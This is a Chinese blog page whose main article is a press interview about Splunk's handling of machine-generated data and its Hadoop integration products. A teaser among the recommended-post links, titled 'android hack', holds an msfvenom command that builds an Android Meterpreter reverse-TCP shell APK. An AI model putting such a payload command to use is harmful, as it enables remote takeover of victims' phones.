根据数据来源划分,大数据主要包括三类:商业运作产生的数据人类行为产生的数据机器数据。目前,人们谈论最多的是前两类数据的 处理和分析。创立于2004年的Splunk公司独树一帜,从公司成立之初就一直专注于机器数据的处理和分析。Splunk公司产品营销副总裁 Sanjay Mehta在接受本报记者采访时表示,机器大数据未来具有非常广阔的发展前景。

  机器大数据有可为

   何为机器数据?人们的每项活动都会在机器数据中留下痕迹,这些数据包含客户行为、使用事务处理、应用程序行为、服务水平等的明确记录,像人们非常熟悉的 日志文件传感器数据等都是机器数据。Sanjay Mehta表示:“机器生成的数据是发展最快、最复杂同时也是最宝贵的那部分大数据。但是现有的数据分析、管理和监控解决方案很少有为这类数据设计的。”

  机器数据处理的难点在于以下三方面:机器数据来自于不同来源,而将这些不同来源关联起来十分复杂;机器数据主要是非结构化的,很难用预先定义的架构来处理;机器数据对实时处理的要求非常高。Splunk的产品被外界称为机器数据的引 擎,它能够有效应对机器数据的种种挑战,收集非结构化的时间序列机器数据,并编制索引加以利用。Sanjay Mehta表示,Splunk可以读取人们能够想到的任何来源的数据,比如网络流量、Web服务器、自定义应用程序、应用程序服务器、虚拟机管理程序、GSP系统甚至股市源、社交媒体和结构化数据库的数据,并通过它们实时掌握业务状况,深入分析在整个IT系统和基础设施中发生了什么,从而做出正确决策。

  增强Hadoop的易用性

   “我们的某些客户告诉我们,他们要使用Hadoop,希望以更低成本来存储数据。但问题是,如果想部署Hadoop并基于它获得更多价值并不是一件容易 的事。部署Hadoop所花费的人力和服务可能是部署普通软件的20倍。如果想充分发挥Hadoop的作用,至少要将13个项目与Hadoop进行集成。 另外很多客户反映,Hadoop平台上的数据量太大而无法随意迁移。”Sanjay Mehta表示,“2012年10月,我们推出了 Splunk Hadoop Connect,让用户可以简单、方便地在Splunk Enterprise和Hadoop之间转移数据。”

  Splunk Hadoop Connect打通了Hadoop与Splunk产品平台之间的传输通道, 用户可以将Splunk平台上的数据传输到Hadoop平台上进行长期存储。Hadoop上的数据也可以实时地传输到Splunk上进行分析和可视化。

  对于很多客户来说,最棘手的问题是Hadoop上的数据量太大,无法随意移动。

  2013年6月22日,Splunk 发布了Hunk测试版——Splunk Analytics for Hadoop,它提供了针对Hadoop平台的互动数据探索分析和可视化功能,这为用户使用Hadoop平台提供了更多便利。

   Splunk Analytics for Hadoop是一个全功能的集成的产品,针对Hadoop上的数据在同一个平台上提供了互动的数据探索、分 析和可视化三种必要的功能。“Splunk Analytics for Hadoop为用户提供了一个简单、易用的界面,不仅专业人员可以使用,即使普 通的管理人员也能使用它对数据进行访问和分析。以前可能要花几个月时间来了解和分析数据,现在使用 Splunk Analytics for Hadoop,可能只要一小时甚至几分钟。”Sanjay Mehta表示。

   Splunk Analytics for Hadoop是首个采用Splunk虚拟索引技术(正在申请专利)的产品。用户通过它可以无缝使用 Splunk的所有技术,包括Splunk搜索处理语言(SPL)等。它可以实现互动地探索、分析和可视化存储在任何地方的数据,就像这些数据存储在 Splunk Index中一样。Sanjay Mehta介绍说:“未来,我们会把更多技术创新反馈给Hadoop社区。目前,我们正在邀请特定的用户 参与Hunk的测试。”

机器大数据也离不开Hadoop的更多相关文章

  1. 大数据系列(4)——Hadoop集群VSFTP和SecureCRT安装配置

    前言 经过前三篇文章的介绍,已经通过VMware安装了Hadoop的集群环境,当然,我相信安装的过程肯定遇到或多或少的问题,这些都需要自己解决,解决的过程就是学习的过程,本篇的来介绍几个Hadoop环 ...

  2. 大数据系列(3)——Hadoop集群完全分布式坏境搭建

    前言 上一篇我们讲解了Hadoop单节点的安装,并且已经通过VMware安装了一台CentOS 6.8的Linux系统,咱们本篇的目标就是要配置一个真正的完全分布式的Hadoop集群,闲言少叙,进入本 ...

  3. 大数据系列(2)——Hadoop集群坏境CentOS安装

    前言 前面我们主要分析了搭建Hadoop集群所需要准备的内容和一些提前规划好的项,本篇我们主要来分析如何安装CentOS操作系统,以及一些基础的设置,闲言少叙,我们进入本篇的正题. 技术准备 VMwa ...

  4. 一文看懂大数据的技术生态圈,Hadoop,hive,spark都有了

    一文看懂大数据的技术生态圈,Hadoop,hive,spark都有了 转载: 大数据本身是个很宽泛的概念,Hadoop生态圈(或者泛生态圈)基本上都是为了处理超过单机尺度的数据处理而诞生的.你可以把它 ...

  5. 大数据系列(5)——Hadoop集群MYSQL的安装

    前言 有一段时间没写文章了,最近事情挺多的,现在咱们回归正题,经过前面四篇文章的介绍,已经通过VMware安装了Hadoop的集群环境,相关的两款软件VSFTP和SecureCRT也已经正常安装了. ...

  6. 大数据框架:Spark vs Hadoop vs Storm

    大数据时代,TB级甚至PB级数据已经超过单机尺度的数据处理,分布式处理系统应运而生. 知识预热 「专治不明觉厉」之“大数据”: 大数据生态圈及其技术栈: 关于大数据的四大特征(4V) 海量的数据规模( ...

  7. 大数据项目实践:基于hadoop+spark+mongodb+mysql+c#开发医院临床知识库系统

    一.前言 从20世纪90年代数字化医院概念提出到至今的20多年时间,数字化医院(Digital Hospital)在国内各大医院飞速的普及推广发展,并取得骄人成绩.不但有数字化医院管理信息系统(HIS ...

  8. 大数据系列(1)——Hadoop集群坏境搭建配置

    前言 关于时下最热的技术潮流,无疑大数据是首当其中最热的一个技术点,关于大数据的概念和方法论铺天盖地的到处宣扬,但其实很多公司或者技术人员也不能详细的讲解其真正的含义或者就没找到能被落地实施的可行性方 ...

  9. 【大数据】Summingbird(Storm + Hadoop)的demo运行

    一.前言 为了运行summingbird demo,笔者走了很多的弯路,并且在国内基本上是查阅不到任何的资料,耗时很久才搞定了demo的运行.真的是一把辛酸泪,有兴趣想要研究summingbird的园 ...

随机推荐

  1. ViewFlipper实现自动播放的图片库

    作者实现的基础上,加上了文字的变换 public class MainActivity extends Activity { private ViewFlipper viewFlipper; priv ...

  2. [可用]android hack

    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.237 LPORT=4444 R > shell.apk service ...

  3. linux上搭建私服

    环境centos7 解压到/usr/localtar -zxvf /home/ckl/upload/nexus-2.14.3-02-bundle.tar.gz -C /usr/local/ 注意: 一 ...

  4. 如何使用C++11实现C#属性概念设计

    目录(原创博客,版权所有,转载请注明出处 http://www.cnblogs.com/feng-sc) 1.概述 2.C#属性的概念  2.1.简单示例代码介绍C#中的属性  2.2.C++实现效果 ...

  5. Bug中的中的小问题编程需要注意

    Bug中的中的小问题编程需要注意 1. 关于局部变量与全局变量是否同名问题 如果参数传递的是一个数组,且全局变量与参数数据同名,则局部变量作用域中,这两个同名的数据可能会引起冲突. 如下:如果一开始是 ...

  6. javascript data format

    Date.prototype.Format = function(fmt) { var o = { "M+" : this.getMonth()+1, //月份 "d+& ...

  7. iOS 5 故事板进阶(2)

    让我们回到游戏排行窗口Ranking.创建一个 UITableViewController子类,命名为 RankingViewController. 编辑 RankingViewController. ...

  8. 【TypeScript】TypeScript 学习 4——模块

    前端数据验证在改善用户体验上有很大作用,在学了之前的知识的时候,我们很可能会写出以下代码: interface StringValidator { isAcceptable(s: string): b ...

  9. Spring Boot 应用系列 4 -- Spring Boot 2 整合log4j2

    一.背景 1. log4j2传承于log4j和logback,它是目前性能最好的日志处理工具,有关它们的性能对比请看: 2. 除了性能好之外,log4j2有这么几个重要的新features: (1) ...

  10. LeetCode148:Sort List

    题目: Sort a linked list in O(n log n) time using constant space complexity. 解题思路: 根据题目要求,可知只能用归并排序,其他 ...